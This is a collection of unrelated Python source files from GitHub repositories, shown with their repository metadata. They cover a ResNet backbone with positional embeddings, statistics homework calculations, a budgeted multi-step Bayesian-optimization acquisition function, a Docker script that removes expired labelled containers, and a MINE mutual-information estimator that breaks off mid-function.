            nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),
            nn.Conv2d(planes // 16, 3, kernel_size=3, padding=1, bias=True),
        )  # 224 x 224

    def forward(self, x):
        for stage in (self.tconv1, self.tconv2, self.tconv3,
                      self.tconv4, self.tconv5):
            x = stage(x)
        return x
class Bottleneck(nn.Module):
    """ResNet bottleneck block: 1x1 reduce -> 3x3 -> 1x1 expand (x4), with a
    residual shortcut (identity, or the given projection)."""
    expansion = 4

    def __init__(self, inplanes, planes, stride=1, downsample=None):
        super(Bottleneck, self).__init__()
        # Submodule creation order matches the reference implementation so
        # parameter initialisation consumes the RNG identically.
        self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm2d(planes)
        self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
                               padding=1, bias=False)
        self.bn2 = nn.BatchNorm2d(planes)
        self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
        self.bn3 = nn.BatchNorm2d(planes * 4)
        self.relu = nn.ReLU(inplace=True)
        self.downsample = downsample
        self.stride = stride

    def forward(self, x):
        identity = x if self.downsample is None else self.downsample(x)
        out = self.relu(self.bn1(self.conv1(x)))
        out = self.relu(self.bn2(self.conv2(out)))
        out = self.bn3(self.conv3(out))
        return self.relu(out + identity)
class ResNet(nn.Module):
    """ResNet backbone with a fixed 2D sin-cos positional embedding added to
    the stem output and, when ``mim`` is True, a learnable mask embedding:
    forward() can blend a "masked query" built from a target positional
    embedding into the stem features (masked-image-modeling setup).

    Note: avg_pool/fc are defined but not applied in forward(), which
    returns the layer4 feature map.
    """
    def __init__(self, block, layers, fc_dim=128, in_channel=3, width=1, input_size=224, mix_ratio=0.5, mim=True):
        self.inplanes = 64
        super(ResNet, self).__init__()
        # Stem: 7x7 stride-2 conv + BN + ReLU + 3x3 stride-2 max pool
        # (overall stride 4, matching the pos_embed grid of input_size // 4).
        self.conv1 = nn.Conv2d(in_channel, 64, kernel_size=7, stride=2, padding=3,
                               bias=False)
        self.bn1 = nn.BatchNorm2d(64)
        self.relu = nn.ReLU(inplace=True)
        self.base = int(64 * width)
        self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
        self.layer1 = self._make_layer(block, self.base, layers[0])
        self.layer2 = self._make_layer(block, self.base * 2, layers[1], stride=2)
        self.layer3 = self._make_layer(block, self.base * 4, layers[2], stride=2)
        self.layer4 = self._make_layer(block, self.base * 8, layers[3], stride=2)
        self.out_ftr_size = self.base * 8 * block.expansion
        self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))
        self.fc = nn.Linear(self.out_ftr_size, fc_dim)
        # Non-trainable positional embedding, stored channels-last:
        # (1, input_size/4, input_size/4, 64).
        self.pos_embed = nn.Parameter(torch.zeros(1, int(input_size // 4), int(input_size // 4), 64), requires_grad=False)  # fixed sin-cos embedding
        if mim:
            # Learnable token marking masked positions (MIM only).
            self.mask_embed = nn.Parameter(torch.zeros(1, 64))
        self.mix_ratio = mix_ratio
        self.initialize_weights()
    def initialize_weights(self):
        # He-style init for convs, unit/zero init for BN, then fill the
        # positional embedding buffer with the 2D sin-cos table.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
                m.weight.data.normal_(0, math.sqrt(2. / n))
            elif isinstance(m, nn.BatchNorm2d):
                m.weight.data.fill_(1)
                m.bias.data.zero_()
        pos_embed = get_2d_sincos_pos_embed(self.pos_embed.shape[-1], int(self.pos_embed.size(1)), cls_token=False).reshape(self.pos_embed.size())
        self.pos_embed.data.copy_(torch.from_numpy(pos_embed).float())
    def _make_layer(self, block, planes, blocks, stride=1):
        # Build one ResNet stage; a 1x1 projection shortcut is added for the
        # first block when the stride or channel count changes.
        downsample = None
        if stride != 1 or self.inplanes != planes * block.expansion:
            downsample = nn.Sequential(
                nn.Conv2d(self.inplanes, planes * block.expansion,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(planes * block.expansion),
            )
        layers = []
        layers.append(block(self.inplanes, planes, stride, downsample))
        self.inplanes = planes * block.expansion
        for i in range(1, blocks):
            layers.append(block(self.inplanes, planes))
        return nn.Sequential(*layers)
    def interpolate_pos_encoding(self, x):
        # Return the positional embedding resized (bicubic) to x's spatial
        # size; x is NCHW, the returned embedding stays channels-last.
        b, c, w, h = x.size()
        if w == self.pos_embed.size(1) and h == self.pos_embed.size(2):
            return self.pos_embed
        patch_pos_embed = self.pos_embed
        dim = x.shape[-1]  # NOTE(review): unused
        # we add a small number to avoid floating point error in the interpolation
        # see discussion at https://github.com/facebookresearch/dino/issues/8
        w, h = w + 0.1, h + 0.1
        patch_pos_embed = nn.functional.interpolate(
            patch_pos_embed.permute(0, 3, 1, 2),
            scale_factor=(w / self.pos_embed.size(1), h / self.pos_embed.size(2)),
            mode='bicubic',
        )
        assert int(w) == patch_pos_embed.shape[-2] and int(h) == patch_pos_embed.shape[-1]
        patch_pos_embed = patch_pos_embed.permute(0, 2, 3, 1)
        return patch_pos_embed
    def add_pos_embed(self, x, position):
        # NOTE(review): incomplete/dead code -- `position` is never used and
        # the computed `pos_embed` table is discarded; the function returns
        # None unless the size-match branch is hit.
        assert x.size(-2) == 56 and x.size(-1) == 56
        b, c, w, h = x.size()
        pos_embed = get_2d_sincos_pos_embed(self.pos_embed.shape[-1], int(self.pos_embed.size(1)), cls_token=False).reshape(self.pos_embed.size())
        if w == self.pos_embed.size(1) and h == self.pos_embed.size(2):
            return self.pos_embed
    def forward(self, x, target_pos_embed=None):
        """
        target_pos_embed: [b, 64, h ,w]

        Returns the layer4 feature map. When target_pos_embed is given, a
        "masked query" (target positions + mask token) is blended into the
        stem features with weight mix_ratio before the residual stages.
        """
        x = self.conv1(x)
        x = self.bn1(x)
        x = self.relu(x)
        x = self.maxpool(x)
        # Add the (possibly interpolated) fixed positional embedding (NCHW).
        x = x + self.interpolate_pos_encoding(x).permute(0, 3, 1, 2)
        outs = []  # NOTE(review): unused
        if target_pos_embed is not None:
            masked_query = target_pos_embed + self.mask_embed.unsqueeze(-1).unsqueeze(-1)
            x = self.mix_ratio * masked_query + (1 - self.mix_ratio) * x
        x = self.layer1(x)
        x = self.layer2(x)
        x = self.layer3(x)
        x = self.layer4(x)
        return x
def resnet18(fc_dim=128, pretrained=False, **kwargs):
    """Constructs a ResNet-18 model (BasicBlock, layers [2, 2, 2, 2]).

    Args:
        fc_dim: output dimension of the projection head ``fc``.
        pretrained: accepted for API compatibility only -- pre-trained
            weights are NOT loaded by this implementation.
        **kwargs: forwarded to ResNet (in_channel, width, input_size, ...).
    """
    model = ResNet(BasicBlock, [2, 2, 2, 2], fc_dim=fc_dim, **kwargs)
    return model
def resnet50(fc_dim=128,pretrained=False, **kwargs):
    """Constructs a ResNet-50 model (Bottleneck, layers [3, 4, 6, 3]).

    Args:
        fc_dim: output dimension of the projection head ``fc``.
        pretrained: accepted for API compatibility only -- pre-trained
            weights are NOT loaded by this implementation.
        **kwargs: forwarded to ResNet (in_channel, width, input_size, ...).
    """
    model = ResNet(Bottleneck, [3, 4, 6, 3], fc_dim=fc_dim, **kwargs)
    return model
# model = resnet50()
# input_ = torch.randn([4, 3, 224, 224])
# target_pos = torch.randn([4, 64, 56, 56])
# outs = model(input_, target_pos)
# print([out.size() for out in outs])
| shaofeng-z/SimConvMIM | utils/resnet.py | resnet.py | py | 9,175 | python | en | code | 0 | github-code | 90 |
72571084778 | import numpy as np
from metodos_quantitativos import MetodosQuantitativos, Metodo2kr, UmFator
# Driver: works through statistics homework exercises 6-8 using the
# project helper MetodosQuantitativos (confidence intervals, t-tests,
# paired/unpaired comparisons, sample-size calculations).
if __name__ == "__main__":
    m = MetodosQuantitativos()
    # 6 a) unpaired two-sample comparison at 90% confidence.
    print("\n------ 6 a)")
    a = [17, 12, 9, 11, 14, 12]
    b = [20, 6, 10, 12, 15, 7, 9, 10]
    confidence = 0.9
    m.observacoes_nao_pareadas(a=a, b=b, confidence=confidence)
    # 6 b) two-sample t-test on the same data at 95% confidence.
    print("\n----- 6 b)")
    a = [17, 12, 9, 11, 14, 12]
    b = [20, 6, 10, 12, 15, 7, 9, 10]
    confidence = 0.95
    m.t_test(confidence=confidence, a=a, b=b)
    # 6 c) sample size needed for a maximum error of 10%.
    print("\n----- 6 c)")
    a = [17, 12, 9, 11, 14, 12]
    confidence = 0.95
    erro = 10
    m.tamanho_do_modelo_para_erro_maximo(erro=erro, confidence=confidence, a=a)
    # print("\n----- tamanho proporcao")
    # confidence = 0.9
    # p = 0.5
    # m.tamanho_do_modelo_para_erro_maximo_para_amostra(erro, confidence, p, n_original, r)
    # 6 d) one-sided (upper) confidence interval for a proportion.
    print("\n---- 6 d)")
    p = 0.333
    confidence = 0.95
    n = 6
    m._intervalo_de_confianca_de_um_lado_proporcao(p, confidence, n, "superior")
    # 6 e) paired observations at 95% confidence.
    print("\n---- 6 e)")
    confidence = 0.95
    a = [17, 12, 9, 11, 14, 12]
    b = [21, 18, 8, 13, 17, 17]
    m.observacoes_pareadas(confidence=confidence, a=a, b=b)
    # 6 f) paired observations, one-sided (upper) interval.
    print("\n---- 6 f)")
    confidence = 0.975
    a = [17, 12, 9, 11, 14, 12]
    b = [21, 18, 8, 13, 17, 17]
    m.observacoes_pareadas_intervalo_de_confianca_de_um_lado(a=a, b=b, confidence=confidence, type='superior', decimals=6)
    # 7 a and b: done by hand (no code needed).
    print("\n---- 7 c)")
    a = [70, 74, 64, 68, 72, 78, 71, 64]
    m.tamanho_do_modelo_para_erro_maximo(erro=1, confidence=0.95, a=a)
    # 7 d) t-test from summary statistics (means/variances/sizes).
    print("\n--- 7 d)")
    confidence = 0.6
    x_a = 70.125
    variance_a = 4.7939*4.7939
    n_a = 8
    x_b = 72
    variance_b = 3.6*3.6
    n_b = 10
    m.t_test(confidence=confidence, n_a=n_a, n_b=n_b, x_a=x_a, x_b=x_b,
             variance_a=variance_a, variance_b=variance_b)
    # 7 e) same data, one-sided (upper) test at 80% confidence.
    print("\n---- 7 e)")
    confidence = 0.8
    m.t_test(confidence=confidence, n_a=n_a, n_b=n_b, x_a=x_a, x_b=x_b,
             variance_a=variance_a, variance_b=variance_b, test_type="superior")
    # 7 f) trick question: two-sided proportion interval.
    print("\n---- 7 f)")
    confidence = 0.95
    p = 2/8
    n = 8
    m._intervalo_de_confianca_de_dois_lados_proporcao(confidence=confidence, p=p, n=n)
    # 8 a) paired observations (confidence carried over from 7 f).
    print("\n---- 8 a)")
    a = [70,80,69,89,65,30,80,82,65,45]
    b = [80,85,70,90,60,32,89,80,70,40]
    m.observacoes_pareadas(confidence=confidence, a=a, b=b)
    # 8 b) one-sided (lower) confidence interval for a proportion.
    print("\n---- 8 b)")
    confidence = 0.95
    p = 7/10
    n = 10
    m._intervalo_de_confianca_de_um_lado_proporcao(p, confidence, n, type="inferior")
2503219521 | #!/usr/bin/env python3
# (c) Facebook, Inc. and its affiliates. Confidential and proprietary.
from __future__ import annotations
from typing import Any, Callable, Dict, List, Optional, Type, Union
import torch
from botorch.acquisition.acquisition import AcquisitionFunction
from botorch.acquisition.multi_step_lookahead import (
qMultiStepLookahead,
TAcqfArgConstructor,
_compute_stage_value,
_construct_sample_weights,
)
from botorch.acquisition.objective import AcquisitionObjective, ScalarizedObjective
from botorch.models.model import Model
from botorch.sampling.samplers import MCSampler, SobolQMCNormalSampler
from botorch.utils.transforms import (
t_batch_mode_transform,
)
from boss.acquisition_functions.budgeted_ei import (
BudgetedExpectedImprovement,
)
from boss.samplers.posterior_mean_sampler import PosteriorMeanSampler
from torch import Tensor
from torch.nn import Module
class BudgetedMultiStepExpectedImprovement(qMultiStepLookahead):
    r"""Budgeted Multi-Step Look-Ahead Expected Improvement (one-shot optimization).

    A multi-step lookahead acquisition function where every stage (including
    the terminal one) is valued by ``BudgetedExpectedImprovement`` and the
    remaining budget is threaded through the fantasy tree by ``_step``.
    """
    def __init__(
        self,
        model: Model,
        cost_function: Callable,
        budget: Union[float, Tensor],
        num_fantasies: Optional[List[int]] = None,
        samplers: Optional[List[MCSampler]] = None,
        X_pending: Optional[Tensor] = None,
        collapse_fantasy_base_samples: bool = True,
    ) -> None:
        r"""Budgeted Multi-Step Expected Improvement.
        Args:
            model: A fitted model. It must expose `num_outputs`; output 0 is
                treated as the objective (see the scalarization weights below).
            cost_function: Callable mapping candidates to evaluation costs.
                Must also expose `update_reference_point` (used by `_step`).
            budget: A value determining the budget constraint.
            num_fantasies: A list `[f_1, ..., f_k]` containing the number of fantasy
                samples for the `k` look-ahead steps.
            samplers: A list of MCSampler objects to be used for sampling fantasies in
                each stage.
            X_pending: A `m x d`-dim Tensor of `m` design points that have points that
                have been submitted for function evaluation but have not yet been
                evaluated. Concatenated into `X` upon forward call. Copied and set to
                have no gradient.
            collapse_fantasy_base_samples: If True, collapse_batch_dims of the Samplers
                will be applied on fantasy batch dimensions as well, meaning that base
                samples are the same in all subtrees starting from the same level.
        """
        # TODO: This objective is never really used.
        weights = torch.zeros(model.num_outputs, dtype=torch.double)
        weights[0] = 1.0
        objective = ScalarizedObjective(weights=weights)
        # Every lookahead step uses a batch of exactly one candidate.
        lookahead_batch_sizes = [1 for _ in num_fantasies]
        n_lookahead_steps = len(lookahead_batch_sizes) + 1
        # Budgeted EI is the value function at every stage; its kwargs are
        # built per-stage by `budgeted_ei_argfac` (cost function + budget).
        valfunc_cls = [BudgetedExpectedImprovement for _ in range(n_lookahead_steps)]
        valfunc_argfacs = [budgeted_ei_argfac for _ in range(n_lookahead_steps)]
        # Set samplers
        if samplers is None:
            # The batch_range is not set here and left to sampler default of (0, -2),
            # meaning that collapse_batch_dims will be applied on fantasy batch dimensions.
            # If collapse_fantasy_base_samples is False, the batch_range is updated during
            # the forward call.
            samplers: List[MCSampler] = [
                PosteriorMeanSampler(collapse_batch_dims=True)
                if nf == 1
                else SobolQMCNormalSampler(
                    num_samples=nf, resample=False, collapse_batch_dims=True
                )
                for nf in num_fantasies
            ]
        super().__init__(
            model=model,
            batch_sizes=lookahead_batch_sizes,
            samplers=samplers,
            valfunc_cls=valfunc_cls,
            valfunc_argfacs=valfunc_argfacs,
            objective=objective,
            X_pending=X_pending,
            collapse_fantasy_base_samples=collapse_fantasy_base_samples,
        )
        self.cost_function = cost_function
        self.budget = budget
    @t_batch_mode_transform()
    def forward(self, X: Tensor) -> Tensor:
        r"""Evaluate qMultiStepLookahead on the candidate set X.
        Args:
            X: A `batch_shape x q' x d`-dim Tensor with `q'` design points for each
                batch, where `q' = q_0 + f_1 q_1 + f_2 f_1 q_2 + ...`. Here `q_i`
                is the number of candidates jointly considered in look-ahead step
                `i`, and `f_i` is respective number of fantasies.
        Returns:
            The acquisition value for each batch as a tensor of shape `batch_shape`.
        """
        Xs = self.get_multi_step_tree_input_representation(X)
        # set batch_range on samplers if not collapsing on fantasy dims
        if not self._collapse_fantasy_base_samples:
            self._set_samplers_batch_range(batch_shape=X.shape[:-2])
        # Recursive budget-aware lookahead over the fantasy tree.
        return _step(
            model=self.model,
            cost_function=self.cost_function,
            Xs=Xs,
            samplers=self.samplers,
            valfunc_cls=self._valfunc_cls,
            valfunc_argfacs=self._valfunc_argfacs,
            inner_samplers=self.inner_samplers,
            objective=self.objective,
            budget=self.budget,
            running_val=None,
        )
def _step(
    model: Model,
    cost_function: Callable,
    Xs: List[Tensor],
    samplers: List[Optional[MCSampler]],
    valfunc_cls: List[Optional[Type[AcquisitionFunction]]],
    valfunc_argfacs: List[Optional[TAcqfArgConstructor]],
    inner_samplers: List[Optional[MCSampler]],
    objective: AcquisitionObjective,
    budget: Tensor,
    running_val: Optional[Tensor] = None,
    sample_weights: Optional[Tensor] = None,
    step_index: int = 0,
) -> Tensor:
    r"""Recursive multi-step look-ahead computation.
    Helper function computing the "value-to-go" of a multi-step lookahead scheme.
    Args:
        model: A Model of appropriate batch size. Specifically, it must be possible to
            evaluate the model's posterior at `Xs[0]`.
        cost_function: Maps the candidate tensor to its evaluation cost; must
            also expose `update_reference_point`, used to re-anchor the cost
            at each recursion level.
        Xs: A list `[X_j, ..., X_k]` of tensors, where `X_i` has shape
            `f_i x .... x f_1 x batch_shape x q_i x d`.
        samplers: A list of `k - j` samplers, such that the number of samples of sampler
            `i` is `f_i`. The last element of this list is considered the
            "inner sampler", which is used for evaluating the objective in case it is an
            MCAcquisitionObjective.
        valfunc_cls: A list of acquisition function class to be used as the (stage +
            terminal) value functions. Each element (except for the last one) can be
            `None`, in which case a zero stage value is assumed for the respective
            stage.
        valfunc_argfacs: A list of callables that map a `Model` and input tensor `X` to
            a dictionary of kwargs for the respective stage value function constructor.
            If `None`, only the standard `model`, `sampler` and `objective` kwargs will
            be used.
        inner_samplers: A list of `MCSampler` objects, each to be used in the stage
            value function at the corresponding index.
        objective: The AcquisitionObjective under which the model output is evaluated.
        budget: The budget remaining at this step; reduced by `cost_function(X)`
            before recursing into the next step.
        running_val: A `batch_shape`-dim tensor containing the current running value.
        sample_weights: A tensor of shape `f_i x .... x f_1 x batch_shape` when called
            in the `i`-th step by which to weight the stage value samples. Used in
            conjunction with Gauss-Hermite integration or importance sampling. Assumed
            to be `None` in the initial step (when `step_index=0`).
        step_index: The index of the look-ahead step. `step_index=0` indicates the
            initial step.
    Returns:
        A `b`-dim tensor containing the multi-step value of the design `X`.
    """
    X = Xs[0]
    if sample_weights is None:  # only happens in the initial step
        sample_weights = torch.ones(*X.shape[:-2], device=X.device, dtype=X.dtype)
    # compute stage value
    stage_val = _compute_stage_value(
        model=model,
        valfunc_cls=valfunc_cls[0],
        X=X,
        objective=objective,
        inner_sampler=inner_samplers[0],
        # arg_fac is pre-bound with this stage's cost function and remaining budget.
        arg_fac=valfunc_argfacs[0](cost_function, budget),
    )
    if stage_val is not None:  # update running value
        # if not None, running_val has shape f_{i-1} x ... x f_1 x batch_shape
        # stage_val has shape f_i x ... x f_1 x batch_shape
        # this sum will add a dimension to running_val so that
        # updated running_val has shape f_i x ... x f_1 x batch_shape
        running_val = stage_val if running_val is None else running_val + stage_val
    # base case: no more fantasizing, return value
    if len(Xs) == 1:
        # compute weighted average over all leaf nodes of the tree
        batch_shape = running_val.shape[step_index:]
        # expand sample weights to make sure it is the same shape as running_val,
        # because we need to take a sum over sample weights for computing the
        # weighted average
        sample_weights = sample_weights.expand(running_val.shape)
        return (running_val * sample_weights).view(-1, *batch_shape).sum(dim=0)
    # construct fantasy model (with batch shape f_{j+1} x ... x f_1 x batch_shape)
    prop_grads = step_index > 0  # need to propagate gradients for steps > 0
    fantasy_model = model.fantasize(
        X=X, sampler=samplers[0], observation_noise=True, propagate_grads=prop_grads
    )
    # augment sample weights appropriately
    sample_weights = _construct_sample_weights(
        prev_weights=sample_weights, sampler=samplers[0]
    )
    # update budget
    new_budget = budget - cost_function(X)
    # update cost function
    new_cost_function = cost_function.update_reference_point(X)
    return _step(
        model=fantasy_model,
        cost_function=new_cost_function,
        Xs=Xs[1:],
        samplers=samplers[1:],
        valfunc_cls=valfunc_cls[1:],
        valfunc_argfacs=valfunc_argfacs[1:],
        inner_samplers=inner_samplers[1:],
        objective=objective,
        budget=new_budget,
        running_val=running_val,
        sample_weights=sample_weights,
        step_index=step_index + 1,
    )
class budgeted_ei_argfac(Module):
    r"""Builds the kwargs for ``BudgetedExpectedImprovement`` at each stage.

    Given a (fantasy) model, extracts the incumbent -- the best observed
    outcome on the original (untransformed) scale -- and pairs it with the
    stage's cost function and remaining budget.
    """
    def __init__(self, cost_function: Callable, budget: Union[float, Tensor]) -> None:
        super().__init__()
        self.cost_function = cost_function
        self.budget = budget
    def forward(self, model: Model, X: Tensor) -> Dict[str, Any]:
        # Training targets live in the transformed space; undo the outcome
        # transform before taking the incumbent.
        raw_targets = model.outcome_transform.untransform(model.train_targets)[0]
        incumbent = raw_targets.max(dim=-1, keepdim=True).values
        return {
            "cost_function": self.cost_function,
            "best_f": incumbent,
            "budget": self.budget,
        }
| RaulAstudillo06/BOSS | boss/acquisition_functions/budgeted_multi_step_ei.py | budgeted_multi_step_ei.py | py | 11,139 | python | en | code | 1 | github-code | 90 |
12570891610 | import docker
from datetime import datetime
import time
client = docker.from_env()
print("Let the killing begin :]")
# Reaper loop: once per minute, stop and remove every container whose
# 'DeathDate' label lies in the past, delete its volumes, and prune
# orphaned networks.
while True:
    # check all containers on the host
    for container in client.containers.list():
        # print("scanning...found:", container.name)
        if 'DeathDate' in container.attrs['Config']['Labels']:
            # get the deathdate label of the containers in order to shut them down
            DeathDate = datetime.strptime(container.attrs['Config']['Labels']['DeathDate'], '%Y-%m-%d %H:%M:%S')
            # NOTE(review): naive datetime comparison -- assumes the label is
            # expressed in the host's local timezone; confirm.
            if datetime.now() > DeathDate:
                container.stop()
                container.remove()
                print("stopped and removed:", container.name)
                # also remove all persistent volumes
                for mount in [client.volumes.get(volume['Name']) for volume in container.attrs['Mounts']]:
                    mount.remove()
                    print("removed volume:",mount)
    # remove orphaned networks
    client.networks.prune()
    # Restored: this line was corrupted by metadata fused into the source dump.
    time.sleep(60)
74798874216 | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.autograd as autograd
from .pytorchtools import EarlyStopping
import numpy as np
from sklearn.model_selection import train_test_split
# from .DiscreteCondEnt import subset
import os
from ..util import plot_util
# from ..utils import save_train_curve
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.animation as animation
def save_train_curve(train_loss, valid_loss, figName):
    """Plot training vs. validation loss curves and save the figure to ``figName``.

    The epoch with the minimum validation loss (the early-stopping point) is
    marked with a dashed vertical red line. The figure is written to disk and
    closed; nothing is shown interactively (Agg backend).
    """
    # visualize the loss as the network trained
    fig = plt.figure(figsize=(10,8))
    plt.plot(range(1,len(train_loss)+1),train_loss, label='Training Loss')
    plt.plot(range(1,len(valid_loss)+1),valid_loss,label='Validation Loss')
    # find position of lowest validation loss
    minposs = valid_loss.index(min(valid_loss))+1
    plt.axvline(minposs, linestyle='--', color='r',label='Early Stopping Checkpoint')
    plt.xlabel('epochs')
    plt.ylabel('loss')
    plt.xlim(0, len(train_loss)+1) # consistent scale
    plt.grid(True)
    plt.legend()
    plt.tight_layout()
    fig.savefig(figName, bbox_inches='tight')
    plt.close()
def sample_batch(data, resp=0, cond=[1], batch_size=100, sample_mode='marginal'):
    """Draw a batch of (response, conditioning) samples from ``data``.

    Args:
        data: Array of shape (N, D) holding the full data set.
        resp: Column index of the response variable.
        cond: List of column indices of the conditioning variables.
            (The default is never mutated here, so the mutable default is safe.)
        batch_size: Number of rows in the returned batch.
        sample_mode: One of
            'joint'    -- rows drawn jointly from ``data``;
            'unif'     -- points drawn uniformly from the bounding box of the
                          selected columns;
            'marginal' -- response and conditioning columns drawn from
                          independent rows (product of marginals).

    Returns:
        Array of shape (batch_size, len(cond) + 1). Column 0 is always the
        response, followed by the conditioning columns. (Previously 'joint'
        and 'unif' placed the response LAST while 'marginal' placed it
        FIRST, so joint and marginal batches fed to the same network had
        swapped columns; all modes now agree on the layout.)

    Raises:
        TypeError: If ``cond`` is not a list.
        ValueError: If ``sample_mode`` is not recognized.
    """
    if not isinstance(cond, list):
        raise TypeError("cond should be list")
    # Selected columns, response first, so every sample mode agrees on layout.
    whole = [resp] + cond
    if sample_mode == 'joint':
        index = np.random.choice(range(data.shape[0]), size=batch_size, replace=False)
        batch = data[index][:, whole]
    elif sample_mode == 'unif':
        data_max = data.max(axis=0)[whole]
        data_min = data.min(axis=0)[whole]
        batch = (data_max - data_min) * np.random.random((batch_size, len(cond) + 1)) + data_min
    elif sample_mode == 'marginal':
        joint_index = np.random.choice(range(data.shape[0]), size=batch_size, replace=False)
        marginal_index = np.random.choice(range(data.shape[0]), size=batch_size, replace=False)
        batch = np.concatenate(
            [data[joint_index][:, resp].reshape(-1, 1),
             data[marginal_index][:, cond].reshape(-1, len(cond))],
            axis=1,
        )
    else:
        raise ValueError('Sample mode: {} not recognized.'.format(sample_mode))
    return batch
class MineNet(nn.Module):
    """Three-layer ELU MLP mapping a sample to a scalar statistic T(x)."""
    def __init__(self, input_size=2, hidden_size=100):
        super().__init__()
        self.fc1 = nn.Linear(input_size, hidden_size)
        self.fc2 = nn.Linear(hidden_size, hidden_size)
        self.fc3 = nn.Linear(hidden_size, 1)
        # Small-variance normal weights and zero biases, layer by layer
        # (same initialization order as before, so RNG consumption matches).
        for layer in (self.fc1, self.fc2, self.fc3):
            nn.init.normal_(layer.weight, std=0.02)
            nn.init.constant_(layer.bias, 0)
    def forward(self, input):
        hidden = F.elu(self.fc1(input))
        hidden = F.elu(self.fc2(hidden))
        return self.fc3(hidden)
class Mine():
    """MINE (Mutual Information Neural Estimation) estimator wrapper.

    Trains a ``MineNet`` statistics network on (response, conditioning)
    column pairs of a data matrix and exposes ``predict`` to return the
    estimated mutual-information lower bound (or, in 'unif' mode, a
    cross-entropy-style quantity derived from it).
    """
    def __init__(self, lr, batch_size, patience=int(20), iter_num=int(1e+3), log_freq=int(100), avg_freq=int(10), ma_rate=0.01, verbose=True, resp=0, cond=[1], log=True, sample_mode='marginal', y_label=""):
        # NOTE(review): `cond=[1]` is a mutable default argument; it is not
        # mutated here, but a fresh list per instance would be safer.
        self.lr = lr
        self.batch_size = batch_size
        self.patience = patience  # early-stopping patience (in averaged checks)
        self.iter_num = iter_num  # maximum number of training iterations
        self.log_freq = int(log_freq)  # console print period (iterations)
        self.avg_freq = avg_freq  # loss-averaging / early-stop check period
        self.ma_rate = ma_rate  # moving-average rate for the marginal exp-term
        self.prefix = ''  # output directory for logs/checkpoints/figures
        self.verbose = verbose
        self.resp = resp  # column index of the response variable
        self.cond = cond  # column indices of the conditioning variables
        self.log = log
        self.sample_mode = sample_mode
        self.model_name = ""
        self.ground_truth = None  # optional reference value shown by savefig
        self.paramName = None
        if sample_mode == "marginal":
            self.y_label = "I(X^Y)"
        elif sample_mode == "unif":
            self.y_label = "HXY"
        else:
            self.y_label = y_label
        self.heatmap_frames = []  # for plotting heatmap animation
        self.mine_net = MineNet(input_size=len(self.cond)+1)
        self.mine_net_optim = optim.Adam(self.mine_net.parameters(), lr=self.lr)
    def fit(self, train_data, val_data):
        """Train the statistics network on ``train_data`` with early stopping
        on ``val_data``, then reload the best (checkpointed) weights."""
        self.Xmin = min(train_data[:,0])
        self.Xmax = max(train_data[:,0])
        self.Ymin = min(train_data[:,1])
        self.Ymax = max(train_data[:,1])
        if self.log:
            # Record the training hyper-parameters next to the outputs.
            log_file = os.path.join(self.prefix, "MINE_train.log")
            log = open(log_file, "w")
            log.write("batch_size={0}\n".format(self.batch_size))
            log.write("iter_num={0}\n".format(self.iter_num))
            log.write("log_freq={0}\n".format(self.log_freq))
            log.write("avg_freq={0}\n".format(self.avg_freq))
            log.write("patience={0}\n".format(self.patience))
            log.close()
        heatmap_animation_fig, heatmap_animation_ax = plt.subplots(1, 1)
        # data is x or y
        result = list()
        self.ma_et = 1.  # moving average of exp(T) on marginal samples
        # Early stopping bookkeeping (per-iteration lists, averaged every avg_freq).
        train_mi_lb = []
        valid_mi_lb = []
        self.avg_train_mi_lb = []
        self.avg_valid_mi_lb = []
        earlyStop = EarlyStopping(patience=self.patience, verbose=self.verbose, prefix=self.prefix)
        for i in range(self.iter_num):
            # get train data: one joint batch and one reference (marginal/unif) batch
            batchTrain = sample_batch(train_data, resp= self.resp, cond= self.cond, batch_size=self.batch_size, sample_mode='joint'), \
                         sample_batch(train_data, resp= self.resp, cond= self.cond, batch_size=self.batch_size, sample_mode=self.sample_mode)
            mi_lb, lossTrain = self.update_mine_net(batchTrain, self.mine_net_optim)
            result.append(mi_lb.detach().cpu().numpy())
            train_mi_lb.append(mi_lb.item())
            if self.verbose and (i+1)%(self.log_freq)==0:
                print(result[-1])
            mi_lb_valid = self.forward_pass(val_data)
            valid_mi_lb.append(mi_lb_valid.item())
            if (i+1)%(self.avg_freq)==0:
                # Loss is the negated MI lower bound (we minimize).
                train_loss = - np.average(train_mi_lb)
                valid_loss = - np.average(valid_mi_lb)
                self.avg_train_mi_lb.append(train_loss)
                self.avg_valid_mi_lb.append(valid_loss)
                if self.verbose:
                    print_msg = "[{0}/{1}] train_loss: {2} valid_loss: {3}".format(i, self.iter_num, train_loss, valid_loss)
                    print (print_msg)
                train_mi_lb = []
                valid_mi_lb = []
                earlyStop(valid_loss, self.mine_net)
                if (earlyStop.early_stop):
                    if self.verbose:
                        print("Early stopping")
                    break
            # if self.log:
            #     x = np.linspace(self.Xmin, self.Xmax, 300)
            #     y = np.linspace(self.Ymin, self.Ymax, 300)
            #     xs, ys = np.meshgrid(x,y)
            #     t = self.mine_net(torch.FloatTensor(np.hstack((xs.flatten()[:,None],ys.flatten()[:,None])))).detach().numpy()
            #     t = t.reshape(xs.shape[1], ys.shape[0])
            #     # ixy = t - np.log(self.ma_et.mean().detach().numpy())
            #     heatmap_animation_ax, c = plot_util.getHeatMap(heatmap_animation_ax, xs, ys, t)
            #     self.heatmap_frames.append((c,))
        if self.log:
            # writer = animation.writers['ffmpeg'](fps=1, bitrate=1800)
            # heatmap_animation = animation.ArtistAnimation(heatmap_animation_fig, self.heatmap_frames, interval=200, blit=False)
            # heatmap_animation.save(os.path.join(self.prefix, 'heatmap.mp4'), writer=writer)
            # Save averaged loss curves to files.
            avg_train_mi_lb = np.array(self.avg_train_mi_lb)
            np.savetxt(os.path.join(self.prefix, "avg_train_mi_lb.txt"), avg_train_mi_lb)
            avg_valid_mi_lb = np.array(self.avg_valid_mi_lb)
            np.savetxt(os.path.join(self.prefix, "avg_valid_mi_lb.txt"), avg_valid_mi_lb)
        ch = os.path.join(self.prefix, "checkpoint.pt")
